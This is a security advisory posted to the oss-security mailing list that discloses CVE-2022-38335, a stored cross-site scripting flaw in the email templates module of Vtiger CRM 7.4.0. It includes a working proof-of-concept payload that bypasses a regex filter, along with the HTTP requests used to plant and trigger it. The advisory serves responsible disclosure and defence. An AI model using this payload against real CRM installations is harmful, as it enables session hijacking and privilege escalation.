Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <216ad4805b88424ebaa6cfcaf23743ac@SATVIEEX03.securityresearch.local>
Date: Tue, 27 Sep 2022 15:53:17 +0000
From: SBA - Advisory <advisory@...-research.org>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: [SBA-ADV-20220328-01] CVE-2022-38335: Vtiger CRM 7.4.0 or below
 Stored Cross-Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

# Vtiger CRM Stored Cross-Site Scripting #

Link: https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220328-01_Vtiger_CRM_Stored_Cross-Site_Scripting

## Vulnerability Overview ##

Vtiger CRM 7.4.0 or below is prone to a stored cross-site scripting
vulnerability in the email templates module due to insufficient sanitizing.

* **Identifier**            : SBA-ADV-20220328-01
* **Type of Vulnerability** : Cross Site Scripting
* **Software/Product Name** : [Vtiger CRM](https://code.vtiger.com/vtiger/vtigercrm)
* **Vendor**                : [Vtiger](https://www.vtiger.com/)
* **Affected Versions**     : <= 7.4.0
* **Fixed in Version**      : Not yet
* **CVE ID**                : CVE-2022-38335
* **CVSS Vector**           : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
* **CVSS Base Score**       : 7.6 (High)

## Vendor Description ##

> Vtiger is a PHP based web application that enables businesses to increase
> sales wins, marketing ROI, and support satisfaction by providing tools for
> employees and management work more effectively, capture more data, and
> derive new actionable insights from across the customer lifecycle.

Source: <https://code.vtiger.com/vtiger/vtigercrm>

## Impact ##

An authenticated attacker with the "Email Templates"-module privilege is able
to insert JavaScript into email templates, which is triggered when a victim
views the template.
In the worst case, the victim's session could be hijacked and the attacker is
able to perform actions in the victim's context.
This could lead to privilege escalation if the victim is more privileged than
the attacker (for example an admin).

## Vulnerability Description ##

The following code snippet (`./modules/Emails/models/Mailer.php`) shows the
function which should ensure that JavaScript is removed from the user input:

```php
[...]
public static function getProcessedContent($content) {
    // remove script tags from whole html content
    $processedContent = preg_replace('#<script(.*?)>(.*?)</script>#is', '', $content);
$processedContent = purifyHtmlEventAttributes($processedContent,TRUE);
    return $processedContent;
}
[...]
```

However, the regex `#<script(.*?)>(.*?)</script>#is` is insufficient for
sanitizing JavaScript.

## Proof of Concept ##

If the attacker inserts the payload `<script>alert(1)</script` into an email
template, the JavaScript code will not be removed, because the regex does not
work due to the missing `>`.
The following request demonstrates saving a template containing the malicious
payload:

```http
POST /index.php HTTP/1.1
Host: example.org
Cookie: PHPSESSID=[...]
[...]

__vtrftk=[...]&module=EmailTemplates&action=Save&record=16&subject=Invitation&systemtemplate=1&templatename=Invite+Users&description=Invite+Users&moduleFields=&modulename=Contacts&templateFields=%24contacts-salutation%24&generalFields=&templatecontent=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%3Cscript%3Ealert%281%29%3C%2Fscript%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
```

To load the content of the corresponding template, the following request is
sent by the victim:

```http
POST /index.php HTTP/1.1
Host: example.org
Cookie: PHPSESSID=[...]
[...]

__vtrftk=[...]&module=EmailTemplates&action=ShowTemplateContent&mode=getContent&record=16
```

The server responds with the content that contains the injected JavaScript:

```http
HTTP/1.1 200 OK
[...]

{"success":true,"result":{"content":"<html>\r\n<head>\r\n\t<title><\/title>\r\n<\/head>\r\n<body>\r\n<script>alert(1)<\/script\r\n<\/body>\r\n<\/html>\r\n"}}
```

After that, the HTML content is inserted into the iframe with the id
`TemplateIFrame`, where the JavaScript is executed within the victim's
browser.

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

In other places of the source code, in addition to the
`purifyHtmlEventAttributes` function, the `purify` function of the class
`HTMLPurifier` is used to sanitize JavaScript.
The function `getProcessedContent` should also use `HTMLPurifier` instead of
the regex.

## Timeline ##

* `2022-03-28`: identified the vulnerability in version 7.4.0
* `2022-03-28`: initial vendor contact through public address
* `2022-03-28`: disclosed vulnerability to vendor
* `2022-04-14`: vendor will look into vulnerability
* `2022-05-30`: contacted vendor again but received no reply
* `2022-08-12`: request CVE from MITRE
* `2022-09-16`: MITRE assigned CVE-2022-38335
* `2022-09-27`: public disclosure

## References ##

* Vtiger CRM 7.4.0: <https://code.vtiger.com/vtiger/vtigercrm/repository/archive.zip?ref=7.4.0GA>

## Credits ##

* Corinna Rudlstorfer ([SBA Research](https://www.sba-research.org/))
* Thomas Kostal ([SBA Research](https://www.sba-research.org/))
* Jakob Pachmann ([SBA Research](https://www.sba-research.org/))
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmMzHGQACgkQ+7iGL1j3
dbKc/A/7BBIzXVndN5S6HozpRWjNVeG+C9ms7Nje0tA5GNIneOtqL3rzvAyTfnCc
XL+BR2RS1OGWh33kNv5OqptelOnLw48DJBaxlaNFiXYAP5g+1cSv0pIOyPKE1lOG
u85ZwsS1WqpXS7TmgXqrEy0u4nampyFxRXWStMMOLjJSWXWQTk9c8PUwPTFYLRFz
7UgdWgg9VRT1gZ7rknsBm9dOH9giWFVrY5TfinZ9tgVjBj1PLwfKQhgIAH2W8QJB
91bwJurjqhJcdP9fgM6CQKUdx038amMkRDZOkKzsK2t+M4cI8duP+jag0PLgfcCd
06U8TaomIpehCbbw0MX2n4xQTftJwubZJDr2k1H3XyJmLv+3hoW2HZP5MJY17jyw
bPwiFPgxb1Qm55YFyEJscjnZkj6VZUba8bm3yEDAWMuTFaPQcF4ZczQa34fDUbgo
L5wbmp0L9T06cZbJvQVof52ayHd5JRBopVZ8WVsIYO44lLNcHRLS/YYtHmLJ/1O0
kzbDofUpeDabmY0rxGJ+M2o6aOAOyUMJhMstcuGL6TbPIo+I7LuBpAv7hMas3i9J
o1DcvwJCm4Q6ZvS99w7XHY23J4YY+esL3pwserPBKUc38CEuTvXyLHHL7h9BgqKG
HzNe+3XAxHObXD61j8oJaR8P2zWLD5DpCNe1mAIUKSRqljzUS+E=
=pFzx
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.